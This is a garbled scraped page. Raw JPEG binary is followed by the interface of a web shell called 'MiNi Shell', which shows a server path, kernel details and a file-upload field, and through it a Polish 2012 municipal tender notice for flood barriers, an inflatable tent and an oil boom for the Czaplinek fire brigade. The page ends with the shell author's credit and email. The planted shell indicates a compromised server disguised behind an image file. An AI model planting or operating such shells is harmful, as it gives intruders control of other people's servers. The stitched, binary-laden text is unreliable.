JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120809/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120809/292934-N-2012.html

<p class="kh_header"><b>Czaplinek: Dostawa specjalistycznego sprzętu pożarniczego dla jednostki OSP w Czaplinku w ramach realizacji projektu pn. Utworzenie Centrum Ratownictwa Gminnego poprzez rozbudowę obiektów jednostki OSP Czaplinek i doposażenie w specjalistyczny sprzęt ratowniczo-gaśniczy</b><br>
<b>Numer ogłoszenia: 292934 - 2012; data zamieszczenia: 09.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Czaplinek , Rynek 6, 78-550 Czaplinek, woj. zachodniopomorskie, tel. 94 37 26 200, faks 94 37 26 202.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.czaplinek.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa specjalistycznego sprzętu pożarniczego dla jednostki OSP w Czaplinku w ramach realizacji projektu pn. Utworzenie Centrum Ratownictwa Gminnego poprzez rozbudowę obiektów jednostki OSP Czaplinek i doposażenie w specjalistyczny sprzęt ratowniczo-gaśniczy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest dostawa specjalistycznego sprzętu pożarniczego dla jednostki OSP w Czaplinku w ramach realizacji projektu pn. Utworzenie Centrum Ratownictwa Gminnego poprzez rozbudowę obiektów jednostki OSP Czaplinek i doposażenie w specjalistyczny sprzęt ratowniczo-gaśniczy. 
2.Zamówienie jest podzielone na trzy odrębne części: 
Część I: Dostawa pneumatycznego namiotu sypialnego dla zabezpieczenia długotrwałych akcji ratowniczych, zgodnie z opisem w załączniku nr 2a do SIWZ. 
Część II: Dostawa przenośnego systemu zapór przeciwpowodziowych napełnianych wodą, zgodnie z opisem w załączniku nr 2b do SIWZ.
Część III: Dostawa zapory przeciwolejowej na zwijadle na przyczepie, zgodnie z opisem w załączniku nr 2c do SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 35.11.00.00-8, 39.52.25.30-1, 44.21.23.83-7, 34.22.33.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Odstąpiono od obowiązku wnoszenia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia (załącznik nr 3 do SIWZ). 
Ocena spełniania w/w warunków dokonana zostanie zgodnie z formułą  spełnia / nie spełnia, w oparciu o informacje zawarte w dostarczonych dokumentach lub oświadczeniach</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia (załącznik nr 3 do SIWZ). 
Ocena spełniania w/w warunków dokonana zostanie zgodnie z formułą  spełnia / nie spełnia, w oparciu o informacje zawarte w dostarczonych dokumentach lub oświadczeniach</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia (załącznik nr 3 do SIWZ). 
Ocena spełniania w/w warunków dokonana zostanie zgodnie z formułą  spełnia / nie spełnia, w oparciu o informacje zawarte w dostarczonych dokumentach lub oświadczeniach</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia (załącznik nr 3 do SIWZ). 
Ocena spełniania w/w warunków dokonana zostanie zgodnie z formułą  spełnia / nie spełnia, w oparciu o informacje zawarte w dostarczonych dokumentach lub oświadczeniach</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia (załącznik nr 3 do SIWZ). 
Ocena spełniania w/w warunków dokonana zostanie zgodnie z formułą  spełnia / nie spełnia, w oparciu o informacje zawarte w dostarczonych dokumentach lub oświadczeniach</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">W celu potwierdzenia, że dostawa odpowiada wymogom SIWZ Wykonawca zobowiązany jest dostarczyć karty produktu wraz ze zdjęciami lub rysunkami technicznymi oferowanego sprzętu pożarniczego. Z załączonych dokumentów musi wynikać jednoznacznie, że oferowane produkty spełniają warunki opisane w pkt. III. SIWZ. Jeżeli parametr opisany w pkt. III. nie występuje na karcie produktu, to Zamawiający  przyjmuje, że na podstawie oświadczenia zawartego w pkt. 3 w formularzu oferty, złożonego pod rygorem odpowiedzialności z art. 297 § 1 Kodeksu karnego, oferowany produkt spełnia wymagania SIWZ.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W przypadku składania oferty wspólnej przez grupę przedsiębiorców należy załączyć pełnomocnictwo do reprezentowania podmiotów występujących wspólnie.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia.
Zakres zmian umowy dopuszczalnych przez zamawiającego po uprzednim uzyskaniu jego zgody, w przypadku:
1)konieczności zastosowania innej stawki VAT - dopuszcza się zmianę umowy w zakresie ceny brutto o wartość wynikającą ze zmiany stawki VAT;
2)działania siły wyższej,  
3)przeszkód lub warunków, które mogą mieć wpływ na realizacje dostaw, a które nie mogły być racjonalnie przewidziane przez kompetentnego wykonawcę lub zamawiającego,
4)w zakresie rodzaju/modelu sprzętu w przypadku obiektywnej niemożności dostarczenia sprzętu (zakończona produkcja, niedostępność na rynku, etc.) umowę można zmienić co do rodzaju/typu/modelu sprzętu, pod warunkiem, że urządzenie/urządzenia będą nowszą wersją oferowanego modelu, będą miały lepsze wszystkie parametry, bądź część parametrów i pozostałe parametry bez zmian. 
Zmiana umowy możliwa jest także w następujących przypadkach:
1)zaistnienia omyłki pisarskiej,
2)zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację zamówienia,
3)powstania niejasności lub rozbieżności w rozumieniu pojęć użytych w umowie, których nie będzie można usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu jej jednoznacznej interpretacji.
Zmiany umowy określone powyżej nie będą skutkować zmianą ceny brutto umowy, ani naliczeniem kar umownych, bądź odsetek ustawowych za zwłokę dla którejkolwiek ze stron umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.czaplinek.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski, pokój nr 12
ul. Rynek 6
78-550 Czaplinek.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.08.2012 godzina 11:00, miejsce: Urząd Miejski, pokój nr  3 (Biuro Obsługi Interesanta)
ul. Rynek 6
78-550 Czaplinek.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie realizowane jest w ramach projektu pn.Utworzenie Centrum Ratownictwa Gminnego poprzez rozbudowę obiektów jednostki OSP Czaplinek i doposażenie w specjalistyczny sprzęt ratowniczo-gaśniczy współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Zachodniopomorskiego na lata 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część I: Dostawa pneumatycznego namiotu sypialnego dla zabezpieczenia długotrwałych akcji ratowniczych, zgodnie z opisem w załączniku nr 2a do SIWZ..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ogólne informacje o budowie namiotu będącego przedmiotem zamówienia:
Powłoka namiotu musi być wykonana z tkaniny poliestrowej pokrytej dwustronnie PCV, odporna na promieniowanie ultrafioletowe. Stelaż pneumatyczny musi być wykonany z wielowarstwowej tkaniny poliestrowej na zewnątrz pokrytej PCV. Podłoga namiotu musi być odpinana. Namiot musi posiadać dwoje drzwi dwuskrzydłowych zwijanych, jednowarstwowych. Na zewnątrz drzwi muszą znajdować się kołnierze umożliwiające łączenie z innymi namiotami. Na ścianach bocznych muszą być okna składające się z trzech warstw. Od wewnątrz na stelażu muszą być zlokalizowane miejsca mocowań dla sprzętu oświetleniowego, sprzętu medycznego, itp. Na bocznych ścianach muszą być otwory z rękawami do wprowadzania do wewnątrz przewodów ogrzewania lub filtrowentylacji, przewodów elektrycznych, wodnych, itp. Na zewnątrz muszą być umocowane linki odciągowe oraz szpilki i paliki mocujące. Zastosowane materiały muszą gwarantować prawidłową eksploatację namiotu w zakresie temperatur od -30 °C do +70 °C. 
Dane techniczne zawiera Załącznik nr 2a do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 35.11.00.00-8, 39.52.25.30-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część II: Dostawa przenośnego systemu zapór przeciwpowodziowych napełnianych wodą, zgodnie z opisem w załączniku nr 2b do SIWZ..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa przenośnego systemu zapór przeciwpowodziowych o łącznej długości 600 mb zbudowanego z 24 wałów o rozmiarach każdego wału: długość 25 m, średnica 80 cm. 
I.Ogólne wymagania: 
I.1Każdy wał wykonany z 3-warstwowej tkaniny wodoszczelnej zbrojonej siatką poliestrową, wypełniany wodą (ciśnienie ok. 0,6 atm). 
I.2 Każdy wał wyposażony jest w: 
I.2.1 uniwersalny rękaw do pompowania wody (rękaw wlewowy) zakończony łącznikami tłocznymi o średnicy O 52 i pokrywą O 52,
I.2.2 zawór odpowietrzający, 
I.2.3 system szybkiego opróżniania zapory - dodatkowy zawór spustowy, 
I.2.4 przelotki do mocowania zapór linami, 
I.2.5 uchwyty ułatwiające ułożenie rękawa,
I.2.6 system taśm z klamrą-stoperem do łączenia rękawów ze sobą, 
I.2.7 worek transportowy - pokrowiec.  
I.3 Każdy wał musi być trwale oznakowany zgodnie z obowiązującymi wytycznymi Instytucji Zarządzającej Regionalnym Programem Operacyjnym Województwa Zachodniopomorskiego na lata 2007-2013 dotyczącymi informacji i promocji projektu realizowanego w ramach RPO WZ. Treść oznakowania zostanie uzgodniona z Wykonawcą po zawarciu umowy.
Dane techniczne zawiera Zalącznik nr 2b do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 35.11.00.00-8, 44.21.23.83-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Część III: Dostawa zapory przeciwolejowej na zwijadle na przyczepie, zgodnie z opisem w załączniku nr 2c do SIWZ..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa zapory przeciwolejowej o długości 160 mb na zwijadle zamontowanym na przyczepie. Dostarczony sprzęt musi być nowy, wyprodukowany w 2012 r. 
I Zapora przeciwolejowa: 
I.1 Zapora musi być wykonana z elastycznych, olejoodpornych tworzyw sztucznych.
I.2 Podstawowym elementem zapory musi być sekcja zbudowana z segmentów, dzięki czemu można ją będzie łatwo złożyć i szybko przygotować do akcji.
I.3 Poszczególne sekcje muszą się łączyć w zaporę o dowolnej długości przy pomocy prostych w użyciu elementów szybkozłącznych.
I.4 Zapora musi być wyposażona w taśmę nośną oraz łańcuch, będący jednocześnie balastem, znajdujący się w dolnej części sekcji. 
I.5 Zapora musi posiadać pływaki wypornościowe wykonane z tworzywa piankowego, dzięki czemu będzie niezatapialna i odporna na przebicia. 
I.6 Zapora wyposażona musi być w linki odciągowe mocowane do liny nośnej, dwa trójkąty prowadzące oraz komplet osprzętu do mocowania zapory do brzegu i do dna zbiornika. 
I.7 Dane techniczne zapory przeciwolejowej:
I.7.1 Całkowita szerokość	500 mm
I.7.2 Wolna burta	200 mm
I.7.3 Zanurzenie	300 mm
I.7.4  Długość segmentu	15 lub 20 mb
I.7.5 Materiał zapory Poliester PCV obustronny (ciężar min. 850 g/m2)
I.7.6 Pływaki Pianka polietylenowa około 30 kg/m3
I.7.7 Ciężar 1 mb zapory	max 3,5 kg
I.7.8 Balast Łańcuch galwanizowany
I.7.9 Siła zrywająca materiału PCV na każde 50 mm materiału	około 4000N
I.7.10 Siła rozciągająca materiału PCV		około 450 N
I.7.11 Przenoszenie 	za uchwyty. 
II Zwijadło: 
II.1 Zwijadło musi posiadać wystarczającą pojemność dla wyżej opisanej zapory o długości 160 mb. 
II.2 Konstrukcja zwijadła musi być stalowa ocynkowana ogniowo. 
II.3 Zwijadło musi być zabezpieczone plandeką z materiału odpornego na rozerwanie w kolorze czerwonym. 
II.4 Zwijadło musi być wyposażone w napęd elektryczny. 
III Przyczepa: 
III.1 Przyczepa musi posiadać stosowne atesty, homologację lub ocenę rzeczoznawcy dopuszczającą do rejestracji i użytkowania na drogach publicznych. 
III.2 Przyczepa musi być wyposażona w zaczep kulowy. 
III.3 Przyczepa musi być wyposażona w instalację elektryczną 12V. 
III.4 Przyczepa musi posiadać hamulec najazdowy. 
III.5 Ładowność przyczepy: 1000 kg. 
III.6 Przyczepa musi być trwale oznakowana zgodnie z obowiązującymi wytycznymi Instytucji Zarządzającej Regionalnym Programem Operacyjnym Województwa Zachodniopomorskiego na lata 2007-2013 dotyczącymi informacji i promocji projektu realizowanego w ramach RPO WZ. Treść oznakowania zostanie uzgodniona z Wykonawcą po zawarciu umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 35.11.00.00-8, 34.22.33.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com